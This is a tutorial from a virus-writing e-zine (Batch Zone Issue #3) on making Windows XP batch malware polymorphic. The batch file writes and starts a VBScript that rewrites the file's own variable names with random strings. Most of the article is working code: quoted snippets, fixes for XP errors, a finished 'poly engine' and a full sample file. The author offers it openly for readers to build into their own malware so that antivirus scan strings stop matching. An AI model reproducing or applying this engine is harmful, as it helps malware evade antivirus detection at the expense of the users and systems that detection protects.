*************************************************************************************************
***************************************Batch Zone Issue #3***************************************
*************************************************************************************************

==========================
batchXP polymorphism via vbs [alcopaul]
==========================

intro
=====

hello. it's been a long time since i wrote my last tutorial. now i'm
back, but i think not for good. i'm not sure if i am officially back. 
i don't know. but for now, i will just concentrate on this tute.

spth published "Polymorphism in BatXP" on coderz.net #3. he gave a poly
snippet...

=============================================
< The changed poly-engine >
find "aaaa"<%0>>new.cmd
%aaaa%set ra=0
%aaaa%set rb=0
%aaaa%set /a ra=%number1%+%number2%
%aaaa%set /a rb=%number3%+number4%
%aaaa%If %ra% GEQ %rb% goto ra
%aaaa%goto rb

:ra     %bbbb%
%bbbb%set b=b
%bbbb%set c=c
%bbbb%find "%b%bbb"<%0>>new.cmd

%bbbb%find "%c%ccc"<%0>>new.cmd
%bbbb%goto finish

:rb     %cccc%
%cccc%set b=b
%cccc%set c=c
%cccc%find "%c%ccc"<%0>>new.cmd
%cccc%find "%b%bbb"<%0>>new.cmd
%cccc%goto finish

:finish %dddd%
find "dddd"<%0>>new.cmd
==================================================

i tested the snippet and the code werked and it jives with spth's comments

=========================================================
excerpt:
First it writes the lines with "aaaa" to the file. Then the random-part! 
If the rnd-number 1 and 2 are bigger than rnd-number 2 and 3 then it 
writes the "bbbb"-lines and then the "cccc"-one to the file.
Else first the "cccc" and then the "bbbb". In the end of the code it 
writes the "dddd"-code to the file.
==========================================================

the "poly-ed" file is contained in new.cmd.. and yes, it rearranged the code layouting..
moreover, the new.cmd grew when i repeatedly executed the snippet.. but 
where's the poly? the actual change of scan strings?

i think that antivirus proggies will easily detect successive generations 
of a malware that uses directly spth's routine because it doesn't change string 
combinations....

any other options? yeah.. use jackie's advanced poly (coz i'm lazy to code a new
vbs poly routine and if i did, it'll just be similar coz vb language is limited.. :P)

=======================================================
randomize
set fsobject=createobject("scripting.filesystemobject")
set scriptfile=fsobject.opentextfile(wscript.scriptfullname,1)
jc=scriptfile.readall
jav="jap jc jav jsp jv jlo jnv fsobject scriptfile":jsp=split(jav," ")
for each jv in jsp
for jlo=1 to int(rnd*6)+2:jnv=jnv&chr((int(rnd*22)+97))&int(rnd*9):next
jc=replace(jc,jv,jnv):jnv=""
next
set scriptfile=fsobject.opentextfile(wscript.scriptfullname,2,1)
scriptfile.writeline jc
scriptfile.close

' jackie's advanced poly v0.666 // vbs sample
=====================================================

greeting card.bat, which can be found in b8#1, uses the tech.
the jackie's advanced poly implementation in greeting card.bat runs 
smoothly in windows me.

===================================================================================
snippet from greeting card.bat
::
echo Randomize>>g2b2r8.vbs
echo Set k8f4e0k5 = CreateObject("scripting.filesystemobject")>>g2b2r8.vbs
echo Set e4v7c6o8 = k8f4e0k5.opentextfile("%0", 1)>>g2b2r8.vbs
echo k8j0k2k3 = e4v7c6o8.readall>>g2b2r8.vbs
echo q2j0h8c3 = "o7s5t0d1 a7h1t1q1 d4a1o3d1 e7q8m7n7 n1q6r6f3 r5l0m5f6 (truncated)
l5t6s3r7 i5p5m4d3 k8j0k2k3 q2j0h8c3 k1q4p4e4 u4e8c5c8 o8i4r1b5 e4q1d4j8 (truncated)
k8f4e0k5 e4v7c6o8": k1q4p4e4 = Split(q2j0h8c3, " ")>>g2b2r8.vbs
echo For Each u4e8c5c8 In k1q4p4e4>>g2b2r8.vbs
echo For o8i4r1b5 = 1 To 4: e4q1d4j8 = e4q1d4j8 & Chr((Int(Rnd * 22) + 97)) & Int(Rnd * 9): Next>>g2b2r8.vbs
echo k8j0k2k3 = Replace(k8j0k2k3, u4e8c5c8, e4q1d4j8): e4q1d4j8 = "">>g2b2r8.vbs
echo Next>>g2b2r8.vbs
echo Set e4v7c6o8 = k8f4e0k5.opentextfile("%0", 2, 1)>>g2b2r8.vbs
echo e4v7c6o8.writeline k8j0k2k3>>g2b2r8.vbs
echo e4v7c6o8.Close>>g2b2r8.vbs
start g2b2r8.vbs
::
===================================================================================

but when you use the code above in your batchxp files, errors will arise..

problems and solutions
======================

1.) when the line,

=========================================================
echo Set e4v7c6o8 = k8f4e0k5.opentextfile("%0", 1)>>g2b2r8.vbs
=========================================================

executes, g2b2r8.vbs will contain

======================================================================
Set e4v7c6o8 = k8f4e0k5.opentextfile(""file.cmd"", 1)  (4 quotation marks produced)
======================================================================

and the windows scripting host under XP will throw an error when the above line executes

solution:

===========================================================================
echo Set e4v7c6o8 = k8f4e0k5.opentextfile(%0, 1)>>g2b2r8.vbs (remove quotation marks..)
===========================================================================

so the output will be

===========================================
Set e4v7c6o8 = k8f4e0k5.opentextfile("file.cmd", 1)
===========================================


2.) & is exclusively used by xp batch interpreter as bitwise AND

when the line,

==========================================================================================
echo For o8i4r1b5 = 1 To 4: e4q1d4j8 = e4q1d4j8 & Chr((Int(Rnd * 22) + 97)) & Int(Rnd * 9): Next>>g2b2r8.vbs
==========================================================================================

executes, g2b2r8.vbs will not contain anythin coz the batch file interpreter will raise an error.
the line causes the batch interpreter to bitwise AND e4q1d4j8 with Chr((Int(Rnd * 22) + 97)) and the
result with Int(Rnd * 9), which is invalid in the realms of batch xp, thus producing no output in g2b2r8.vbs.

solution:

use + instead of &, partition the line into 3 parts and convert Int(Rnd * 9) to chr(int(rnd*22)+97) (so that
e4q1d4j8 to be of String type.. string + int = error)

===================================================
echo for jlo=1 to int(rnd*6)+2>>jjj.vbs
echo jnv=jnv+chr((int(rnd*22)+97))+chr(int(rnd*22)+97)>>jjj.vbs
echo next>>jjj.vbs
===================================================

problems fixed...

the batch-jap poly engine (bjpe) version 1.0 for windows XP
=================================================================
^^^tested to work well under Windows* XP version 5.1 Service Pack 1 build 2600

================================================================
echo randomize>>jjj.vbs
echo set fsobject=createobject("scripting.filesystemobject")>>jjj.vbs
echo set scriptfile=fsobject.opentextfile(%0,1)>>jjj.vbs
echo jc=scriptfile.readall>>jjj.vbs
echo jav="jap jc jav jsp jv jlo jnv fsobject scriptfile jjj":jsp=split(jav," ")>>jjj.vbs
echo for each jv in jsp>>jjj.vbs
echo for jlo=1 to int(rnd*6)+2>>jjj.vbs
echo jnv=jnv+chr((int(rnd*22)+97))+chr(int(rnd*22)+97)>>jjj.vbs
echo next>>jjj.vbs
echo jc=replace(jc,jv,jnv):jnv="">>jjj.vbs
echo next>>jjj.vbs
echo set scriptfile=fsobject.opentextfile(%0,2,1)>>jjj.vbs
echo scriptfile.writeline jc>>jjj.vbs
echo scriptfile.close>>jjj.vbs
start jjj.vbs
================================================================

if you want three variables to be changed, for example ggg, hhh and iii, just add them to
jav

=============================================================================
echo jav="ggg hhh iii jap jc jav jsp jv jlo jnv fsobject scriptfile jjj":jsp=split(jav," ")>>jjj.vbs
=============================================================================

working sample
==============

you want a working example, ayt... then feed your mind with this..

bjpe implementation
===================

^^^tested to work well under Windows* XP version 5.1 Service Pack 1 build 2600

======================save as anyname.cmd / anyname.bat==================================
set blah = echo
set shit = copy
set fuck = A
set hhh = B
set yyy = D
%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%hhh%%yyy%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%yyy%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%hhh%%yyy%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%yyy%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%hhh%%yyy%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%yyy%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
echo randomize>>jjj.vbs
echo set fsobject=createobject("scripting.filesystemobject")>>jjj.vbs
echo set scriptfile=fsobject.opentextfile(%0,1)>>jjj.vbs
echo jc=scriptfile.readall>>jjj.vbs
echo jav="blah shit fuck hhh yyy jap jc jav jsp jv jlo jnv fsobject scriptfile jjj":jsp=split(jav," ")>>jjj.vbs
echo for each jv in jsp>>jjj.vbs
echo for jlo=1 to int(rnd*6)+2>>jjj.vbs
echo jnv=jnv+chr((int(rnd*22)+97))+chr(int(rnd*22)+97)>>jjj.vbs
echo next>>jjj.vbs
echo jc=replace(jc,jv,jnv):jnv="">>jjj.vbs
echo next>>jjj.vbs
echo set scriptfile=fsobject.opentextfile(%0,2,1)>>jjj.vbs
echo scriptfile.writeline jc>>jjj.vbs
echo scriptfile.close>>jjj.vbs
start jjj.vbs
%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%hhh%%yyy%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%yyy%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
=========================================================================================

feel the power of batch-jap-poly engine through this code....

it's up to you on how to implement this to your batchxp malware.. or you can refer to greeting card.bat
which can be found on b8#1.... but remember, don't use the poly implementation found in greeting card if you plan
your malware to be poly in XP... but if you are targeting me/98/9x, you can use greeting card's implementation..

Outa Get Me
==========

remember, most techniques have been made and implemented by gazillions of programmers. it's up to you to use
and make somethin' new out of those... in short, be creative.. "Creativity over Mastery!"

i know jackie will understand.. :D

if the poly sample doesn't work well (assuming that your os is Windows* XP version 5.1 Service Pack 1 build 2600)
, just drop me a mail.... alcopaulvsq@digitelone.com...

sorry, i ain't a batch purist..

============================
     alcopaul / brigada ocho
============================

*************************************************************************************************
***************************************Batch Zone Issue #3***************************************
*************************************************************************************************